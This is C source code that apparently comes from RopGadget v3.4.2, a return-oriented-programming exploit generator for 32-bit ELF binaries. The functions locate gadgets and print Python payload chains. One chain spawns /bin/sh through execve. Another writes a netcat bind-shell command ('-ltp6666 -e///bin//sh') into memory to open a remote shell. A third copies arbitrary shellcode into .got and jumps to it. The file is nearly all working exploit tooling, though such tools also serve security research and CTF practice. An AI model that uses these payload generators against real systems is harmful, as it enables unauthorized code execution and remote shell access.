void combo_ropmaker2(void)
{
int i = 0;
int flag = 0;
Elf32_Addr addr;
t_makecode *list_ins = NULL;
/* check combo 1 if possible */
while (tab_combo_ropsh2[i].instruction)
{
if (search_instruction(tab_combo_ropsh2[i].instruction) == 0)
{
flag = 1;
break;
}
i++;
}
if (flag == 0)
fprintf(stdout, "[%s+%s] Combo 1 was found - Possible with the following gadgets. (execve)\n", GREEN, ENDC);
else
fprintf(stderr, "[%s-%s] Combo 1 was not found, missing instruction(s).\n", RED, ENDC);
i = 0;
while (tab_combo_ropsh2[i].instruction)
{
addr = search_instruction(tab_combo_ropsh2[i].instruction);
if (addr)
{
fprintf(stdout, "\t- %s0x%.8x%s => %s%s%s\n", GREEN, addr, ENDC, GREEN, get_gadget_since_addr(addr), ENDC);
if (!flag)
list_ins = add_element(list_ins, get_gadget_since_addr_att(addr), addr);
}
else
fprintf(stdout, "\t- %s..........%s => %s%s%s\n", RED, ENDC, RED, tab_combo_ropsh2[i].instruction, ENDC);
i++;
}
fprintf(stdout, "\t- %s0x%.8x%s => %s.data Addr%s\n", GREEN, Addr_sData, ENDC, GREEN, ENDC);
/* build a python code */
if (!flag)
makecode(list_ins);
}
/* partie 1 | write /bin/sh in .data for execve("/bin/sh", NULL, NULL)*/
static void makepartie1_local(t_makecode *list_ins)
{
Elf32_Addr addr_mov_gadget;
Elf32_Addr addr_xor_gadget;
Elf32_Addr addr_pop_stack_gadget;
Elf32_Addr addr_pop_binsh_gadget;
char *mov_gadget;
char *xor_gadget;
char *pop_stack_gadget;
char *pop_binsh_gadget;
char *first_reg;
char *second_reg;
char reg_stack[32] = "pop %";
char reg_binsh[32] = "pop %";
char instr_xor[32] = "xor %";
addr_mov_gadget = ret_addr_makecodefunc(list_ins, "mov %e?x,(%e?x)");
mov_gadget = get_gadget_since_addr_att(addr_mov_gadget);
first_reg = get_first_reg(mov_gadget);
second_reg = get_second_reg(mov_gadget);
strncat(reg_stack, second_reg, 3);
strncat(reg_binsh, first_reg, 3);
strncat(instr_xor, first_reg, 3);
addr_pop_stack_gadget = ret_addr_makecodefunc(list_ins, reg_stack);
pop_stack_gadget = get_gadget_since_addr_att(addr_pop_stack_gadget);
addr_pop_binsh_gadget = ret_addr_makecodefunc(list_ins, reg_binsh);
pop_binsh_gadget = get_gadget_since_addr_att(addr_pop_binsh_gadget);
addr_xor_gadget = ret_addr_makecodefunc(list_ins, instr_xor);
xor_gadget = get_gadget_since_addr(addr_xor_gadget);
fprintf(stdout, "\t%sPayload%s\n", YELLOW, ENDC);
fprintf(stdout, "\t\t%s# execve /bin/sh generated by RopGadget v3.4.2%s\n", BLUE, ENDC);
/*****************\/bin*********************/
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC);
display_padding(how_many_pop_before(pop_stack_gadget, reg_stack));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data%s\n", BLUE, Addr_sData, ENDC);
display_padding(how_many_pop_after(pop_stack_gadget, reg_stack));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_binsh_gadget, pop_binsh_gadget, ENDC);
display_padding(how_many_pop_before(pop_binsh_gadget, reg_binsh));
fprintf(stdout, "\t\t%sp += \"/bin\"%s\n", BLUE, ENDC);
display_padding(how_many_pop_after(pop_binsh_gadget, reg_binsh));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC);
display_padding(how_many_pop(mov_gadget));
/*******************EOF*********************/
/*****************\//sh*********************/
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC);
display_padding(how_many_pop_before(pop_stack_gadget, reg_stack));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 4%s\n", BLUE, Addr_sData + 4, ENDC);
display_padding(how_many_pop_after(pop_stack_gadget, reg_stack));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_binsh_gadget, pop_binsh_gadget, ENDC);
display_padding(how_many_pop_before(pop_binsh_gadget, reg_binsh));
fprintf(stdout, "\t\t%sp += \"//sh\"%s\n", BLUE, ENDC);
display_padding(how_many_pop_after(pop_binsh_gadget, reg_binsh));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC);
display_padding(how_many_pop(mov_gadget));
/*******************EOF*********************/
/******************\0***********************/
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC);
display_padding(how_many_pop_before(pop_stack_gadget, reg_stack));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 8%s\n", BLUE, Addr_sData + 8, ENDC);
display_padding(how_many_pop_after(pop_stack_gadget, reg_stack));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_xor_gadget, xor_gadget, ENDC);
display_padding(how_many_pop(xor_gadget));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC);
display_padding(how_many_pop(mov_gadget));
/******************EOF**********************/
free(first_reg);
free(second_reg);
}
/* partie 1 bis | write //usr/bin/netcat -ltp6666 -e///bin//sh in .data */
static void makepartie1_remote(t_makecode *list_ins)
{
Elf32_Addr addr_mov_gadget;
Elf32_Addr addr_xor_gadget;
Elf32_Addr addr_pop_stack_gadget;
Elf32_Addr addr_pop_binsh_gadget;
char *mov_gadget;
char *xor_gadget;
char *pop_stack_gadget;
char *pop_binsh_gadget;
char *first_reg;
char *second_reg;
char reg_stack[32] = "pop %";
char reg_binsh[32] = "pop %";
char instr_xor[32] = "xor %";
addr_mov_gadget = ret_addr_makecodefunc(list_ins, "mov %e?x,(%e?x)");
mov_gadget = get_gadget_since_addr_att(addr_mov_gadget);
first_reg = get_first_reg(mov_gadget);
second_reg = get_second_reg(mov_gadget);
strncat(reg_stack, second_reg, 3);
strncat(reg_binsh, first_reg, 3);
strncat(instr_xor, first_reg, 3);
addr_pop_stack_gadget = ret_addr_makecodefunc(list_ins, reg_stack);
pop_stack_gadget = get_gadget_since_addr_att(addr_pop_stack_gadget);
addr_pop_binsh_gadget = ret_addr_makecodefunc(list_ins, reg_binsh);
pop_binsh_gadget = get_gadget_since_addr_att(addr_pop_binsh_gadget);
addr_xor_gadget = ret_addr_makecodefunc(list_ins, instr_xor);
xor_gadget = get_gadget_since_addr(addr_xor_gadget);
fprintf(stdout, "\t%sPayload%s\n", YELLOW, ENDC);
fprintf(stdout, "\t\t%s# execve /bin/sh bindport %s generated by RopGadget v3.4.2%s\n", BLUE, bind_mode.port, ENDC);
/*****************\//us*********************/
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC);
display_padding(how_many_pop_before(pop_stack_gadget, reg_stack));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data%s\n", BLUE, Addr_sData, ENDC);
display_padding(how_many_pop_after(pop_stack_gadget, reg_stack));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_binsh_gadget, pop_binsh_gadget, ENDC);
display_padding(how_many_pop_before(pop_binsh_gadget, reg_binsh));
fprintf(stdout, "\t\t%sp += \"//us\"%s\n", BLUE, ENDC);
display_padding(how_many_pop_after(pop_binsh_gadget, reg_binsh));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC);
display_padding(how_many_pop(mov_gadget));
/*******************EOF*********************/
/******************r/bi*********************/
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC);
display_padding(how_many_pop_before(pop_stack_gadget, reg_stack));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 4%s\n", BLUE, Addr_sData + 4, ENDC);
display_padding(how_many_pop_after(pop_stack_gadget, reg_stack));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_binsh_gadget, pop_binsh_gadget, ENDC);
display_padding(how_many_pop_before(pop_binsh_gadget, reg_binsh));
fprintf(stdout, "\t\t%sp += \"r/bi\"%s\n", BLUE, ENDC);
display_padding(how_many_pop_after(pop_binsh_gadget, reg_binsh));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC);
display_padding(how_many_pop(mov_gadget));
/*******************EOF*********************/
/*****************\n/ne*********************/
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC);
display_padding(how_many_pop_before(pop_stack_gadget, reg_stack));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 8%s\n", BLUE, Addr_sData + 8, ENDC);
display_padding(how_many_pop_after(pop_stack_gadget, reg_stack));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_binsh_gadget, pop_binsh_gadget, ENDC);
display_padding(how_many_pop_before(pop_binsh_gadget, reg_binsh));
fprintf(stdout, "\t\t%sp += \"n/ne\"%s\n", BLUE, ENDC);
display_padding(how_many_pop_after(pop_binsh_gadget, reg_binsh));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC);
display_padding(how_many_pop(mov_gadget));
/*******************EOF*********************/
/******************tcat*********************/
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC);
display_padding(how_many_pop_before(pop_stack_gadget, reg_stack));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 12%s\n", BLUE, Addr_sData + 12, ENDC);
display_padding(how_many_pop_after(pop_stack_gadget, reg_stack));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_binsh_gadget, pop_binsh_gadget, ENDC);
display_padding(how_many_pop_before(pop_binsh_gadget, reg_binsh));
fprintf(stdout, "\t\t%sp += \"tcat\"%s\n", BLUE, ENDC);
display_padding(how_many_pop_after(pop_binsh_gadget, reg_binsh));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC);
display_padding(how_many_pop(mov_gadget));
/*******************EOF*********************/
/******************\0***********************/
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC);
display_padding(how_many_pop_before(pop_stack_gadget, reg_stack));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 16%s\n", BLUE, Addr_sData + 16, ENDC);
display_padding(how_many_pop_after(pop_stack_gadget, reg_stack));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_xor_gadget, xor_gadget, ENDC);
display_padding(how_many_pop(xor_gadget));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC);
display_padding(how_many_pop(mov_gadget));
/******************EOF**********************/
/******************-ltp*********************/
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC);
display_padding(how_many_pop_before(pop_stack_gadget, reg_stack));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 17%s\n", BLUE, Addr_sData + 17, ENDC);
display_padding(how_many_pop_after(pop_stack_gadget, reg_stack));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_binsh_gadget, pop_binsh_gadget, ENDC);
display_padding(how_many_pop_before(pop_binsh_gadget, reg_binsh));
fprintf(stdout, "\t\t%sp += \"-ltp\"%s\n", BLUE, ENDC);
display_padding(how_many_pop_after(pop_binsh_gadget, reg_binsh));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC);
display_padding(how_many_pop(mov_gadget));
/*******************EOF*********************/
/******************<PORT>*******************/
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC);
display_padding(how_many_pop_before(pop_stack_gadget, reg_stack));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 21%s\n", BLUE, Addr_sData + 21, ENDC);
display_padding(how_many_pop_after(pop_stack_gadget, reg_stack));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_binsh_gadget, pop_binsh_gadget, ENDC);
display_padding(how_many_pop_before(pop_binsh_gadget, reg_binsh));
fprintf(stdout, "\t\t%sp += \"%s\"%s\n", BLUE, bind_mode.port, ENDC);
display_padding(how_many_pop_after(pop_binsh_gadget, reg_binsh));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC);
display_padding(how_many_pop(mov_gadget));
/*******************EOF*********************/
/******************\0***********************/
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC);
display_padding(how_many_pop_before(pop_stack_gadget, reg_stack));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 25%s\n", BLUE, Addr_sData + 25, ENDC);
display_padding(how_many_pop_after(pop_stack_gadget, reg_stack));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_xor_gadget, xor_gadget, ENDC);
display_padding(how_many_pop(xor_gadget));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC);
display_padding(how_many_pop(mov_gadget));
/******************EOF**********************/
/******************-e//\********************/
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC);
display_padding(how_many_pop_before(pop_stack_gadget, reg_stack));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 26%s\n", BLUE, Addr_sData + 26, ENDC);
display_padding(how_many_pop_after(pop_stack_gadget, reg_stack));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_binsh_gadget, pop_binsh_gadget, ENDC);
display_padding(how_many_pop_before(pop_binsh_gadget, reg_binsh));
fprintf(stdout, "\t\t%sp += \"-e//\"%s\n", BLUE, ENDC);
display_padding(how_many_pop_after(pop_binsh_gadget, reg_binsh));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC);
display_padding(how_many_pop(mov_gadget));
/*******************EOF*********************/
/*****************\/bin*********************/
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC);
display_padding(how_many_pop_before(pop_stack_gadget, reg_stack));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 30%s\n", BLUE, Addr_sData + 30, ENDC);
display_padding(how_many_pop_after(pop_stack_gadget, reg_stack));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_binsh_gadget, pop_binsh_gadget, ENDC);
display_padding(how_many_pop_before(pop_binsh_gadget, reg_binsh));
fprintf(stdout, "\t\t%sp += \"/bin\"%s\n", BLUE, ENDC);
display_padding(how_many_pop_after(pop_binsh_gadget, reg_binsh));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC);
display_padding(how_many_pop(mov_gadget));
/*******************EOF*********************/
/******************\//sh********************/
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC);
display_padding(how_many_pop_before(pop_stack_gadget, reg_stack));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 34%s\n", BLUE, Addr_sData + 34, ENDC);
display_padding(how_many_pop_after(pop_stack_gadget, reg_stack));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_binsh_gadget, pop_binsh_gadget, ENDC);
display_padding(how_many_pop_before(pop_binsh_gadget, reg_binsh));
fprintf(stdout, "\t\t%sp += \"//sh\"%s\n", BLUE, ENDC);
display_padding(how_many_pop_after(pop_binsh_gadget, reg_binsh));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC);
display_padding(how_many_pop(mov_gadget));
/*******************EOF*********************/
/******************\0***********************/
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC);
display_padding(how_many_pop_before(pop_stack_gadget, reg_stack));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 38%s\n", BLUE, Addr_sData + 38, ENDC);
display_padding(how_many_pop_after(pop_stack_gadget, reg_stack));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_xor_gadget, xor_gadget, ENDC);
display_padding(how_many_pop(xor_gadget));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC);
display_padding(how_many_pop(mov_gadget));
/******************EOF**********************/
/*********************************** make now arg_tab[] ***********************************/
/*
** data + 0 = "//usr/bin/netcat"
** data + 17 = "-ltp6666"
** data + 26 = "-e///bin//sh"
** ^
** +-- data + 38
**
** data + 40 = data + 0
** data + 44 = data + 17
** data + 48 = data + 26
** data + 52 = NULL
*/
/****************** data + 0 ********************/
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC);
display_padding(how_many_pop_before(pop_stack_gadget, reg_stack));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 40%s\n", BLUE, Addr_sData + 40, ENDC);
display_padding(how_many_pop_after(pop_stack_gadget, reg_stack));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_binsh_gadget, pop_binsh_gadget, ENDC);
display_padding(how_many_pop_before(pop_binsh_gadget, reg_binsh));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data%s\n", BLUE, Addr_sData, ENDC);
display_padding(how_many_pop_after(pop_binsh_gadget, reg_binsh));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC);
display_padding(how_many_pop(mov_gadget));
/******************* EOF **********************/
/****************** data + 17 ********************/
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC);
display_padding(how_many_pop_before(pop_stack_gadget, reg_stack));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 44%s\n", BLUE, Addr_sData + 44, ENDC);
display_padding(how_many_pop_after(pop_stack_gadget, reg_stack));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_binsh_gadget, pop_binsh_gadget, ENDC);
display_padding(how_many_pop_before(pop_binsh_gadget, reg_binsh));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 17%s\n", BLUE, Addr_sData + 17, ENDC);
display_padding(how_many_pop_after(pop_binsh_gadget, reg_binsh));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC);
display_padding(how_many_pop(mov_gadget));
/******************* EOF **********************/
/****************** data + 17 ********************/
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC);
display_padding(how_many_pop_before(pop_stack_gadget, reg_stack));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 48%s\n", BLUE, Addr_sData + 48, ENDC);
display_padding(how_many_pop_after(pop_stack_gadget, reg_stack));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_binsh_gadget, pop_binsh_gadget, ENDC);
display_padding(how_many_pop_before(pop_binsh_gadget, reg_binsh));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 26%s\n", BLUE, Addr_sData + 26, ENDC);
display_padding(how_many_pop_after(pop_binsh_gadget, reg_binsh));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC);
display_padding(how_many_pop(mov_gadget));
/******************* EOF **********************/
/****************** \0 [1] ***********************/
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC);
display_padding(how_many_pop_before(pop_stack_gadget, reg_stack));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 52%s\n", BLUE, Addr_sData + 52, ENDC);
display_padding(how_many_pop_after(pop_stack_gadget, reg_stack));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_xor_gadget, xor_gadget, ENDC);
display_padding(how_many_pop(xor_gadget));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC);
display_padding(how_many_pop(mov_gadget));
/****************** EOF **************************/
/****************** \0 [2] ***********************/
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC);
display_padding(how_many_pop_before(pop_stack_gadget, reg_stack));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 53%s\n", BLUE, Addr_sData + 53, ENDC);
display_padding(how_many_pop_after(pop_stack_gadget, reg_stack));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_xor_gadget, xor_gadget, ENDC);
display_padding(how_many_pop(xor_gadget));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC);
display_padding(how_many_pop(mov_gadget));
/****************** EOF **************************/
/****************** \0 [3] ***********************/
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC);
display_padding(how_many_pop_before(pop_stack_gadget, reg_stack));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 54%s\n", BLUE, Addr_sData + 54, ENDC);
display_padding(how_many_pop_after(pop_stack_gadget, reg_stack));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_xor_gadget, xor_gadget, ENDC);
display_padding(how_many_pop(xor_gadget));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC);
display_padding(how_many_pop(mov_gadget));
/****************** EOF **************************/
/****************** \0 [4] ***********************/
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC);
display_padding(how_many_pop_before(pop_stack_gadget, reg_stack));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 55%s\n", BLUE, Addr_sData + 55, ENDC);
display_padding(how_many_pop_after(pop_stack_gadget, reg_stack));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_xor_gadget, xor_gadget, ENDC);
display_padding(how_many_pop(xor_gadget));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC);
display_padding(how_many_pop(mov_gadget));
/****************** EOF **************************/
/**************************************** EOF *********************************************/
free(first_reg);
free(second_reg);
}
/* partie 1 | import shellcode in ROP instruction */
static void makepartie1_importsc(t_makecode *list_ins, int useless, char *pop_reg)
{
/*
gad1 pop %e?x
gad2 mov (%e?x),%e?x
gad3 mov %e?x,%e?x
gad4 mov %e?x,(%e?x)
*/
int i = 0;
Elf32_Addr addr_gad1;
Elf32_Addr addr_gad2;
Elf32_Addr addr_gad3;
Elf32_Addr addr_gad4;
char *gad1;
char *gad2;
char *gad3;
char *gad4;
addr_gad1 = ret_addr_makecodefunc(list_ins, pop_reg);
gad1 = get_gadget_since_addr(addr_gad1);
addr_gad2 = ret_addr_makecodefunc(list_ins, "mov (%e?x),%e?x");
gad2 = get_gadget_since_addr(addr_gad2);
addr_gad3 = ret_addr_makecodefunc(list_ins, "mov %e?x,%e?x");
gad3 = get_gadget_since_addr(addr_gad3);
addr_gad4 = ret_addr_makecodefunc(list_ins, "mov %e?x,(%e?x)");
gad4 = get_gadget_since_addr(addr_gad4);
/* check if all opcodes about shellcode was found in .text */
if (checkOpcodeWasFound() == FALSE)
{
fprintf(stdout, "\t%sPayload%s\n", YELLOW, ENDC);
fprintf(stdout, "\t%s/!\\ Impossible to generate your shellcode because some opcode was not found.%s\n", RED, ENDC);
return ;
}
fprintf(stdout, "\t%sPayload%s\n", YELLOW, ENDC);
fprintf(stdout, "\t\t%s# Shellcode imported! Generated by RopGadget v3.4.2%s\n", BLUE, ENDC);
while (importsc_mode.poctet->next != NULL)
importsc_mode.poctet = importsc_mode.poctet->next;
while (i != importsc_mode.size && importsc_mode.poctet != NULL)
{
/* pop %edx */
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_gad1, gad1, ENDC);
display_padding(how_many_pop_before(gad1, pop_reg));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ 0x%.2x%s\n", BLUE, importsc_mode.poctet->addr, importsc_mode.poctet->octet, ENDC);
display_padding(how_many_pop_after(gad1, pop_reg));
/* mov (%edx),%ecx */
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_gad2, gad2, ENDC);
display_padding(how_many_pop(gad2));
if (useless < 0)
{
/* mov %ecx,%eax */
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_gad3, gad3, ENDC);
display_padding(how_many_pop(gad3));
}
/* pop %edx */
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_gad1, gad1, ENDC);
display_padding(how_many_pop_before(gad1, pop_reg));
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .got + %d%s\n", BLUE, Addr_sGot + i, i, ENDC);
display_padding(how_many_pop_after(gad1, pop_reg));
/* mov %eax,(%edx) */
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_gad4, gad4, ENDC);
display_padding(how_many_pop(gad4));
importsc_mode.poctet = importsc_mode.poctet->back;
i++;
}
fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # jump to our shellcode in .got%s\n", BLUE, Addr_sGot , ENDC);
}
